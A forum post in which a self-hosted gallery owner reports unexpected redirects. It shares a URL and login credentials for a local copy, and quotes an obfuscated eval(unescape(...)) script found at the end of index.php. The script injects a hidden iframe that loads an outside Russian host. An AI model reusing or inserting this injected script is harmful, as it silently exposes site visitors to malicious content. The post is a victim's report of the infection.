hi all!
today something strange happened!
if i open my gallery before the page is completely loaded i am redirected to this page: http://ya.ru/
the gallery is up to date, it happens with all templates, and it happens also on a local backup of the gallery run on XAMPP, the backup has been made a week ago, not after the error appeared (today)
i have only installed the "20 custom fields" mod and added one picture with link in the header.
i can not post the link of the gallery because it is passwordprotected trouch another script.
hope somebody can help.
thank you
sharky
here is teh url to my local machines gallery.. it will be online only if my pc is on.
http://sharkyenergy.dyndns.org/mtbs/gallery
username and pass are both sharky
why istn there a edit button here?
i found a peace of malicious code in the index.php at the very end:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%66%31%38%32%36%33%35%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%39%30%32%38%31%29%2b%27%30%66%34%5c%27%20%77%69%64%74%68%3d%36%36%33%20%68%65%69%67%68%74%3d%32%38%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Ah, the joys of self-hosting...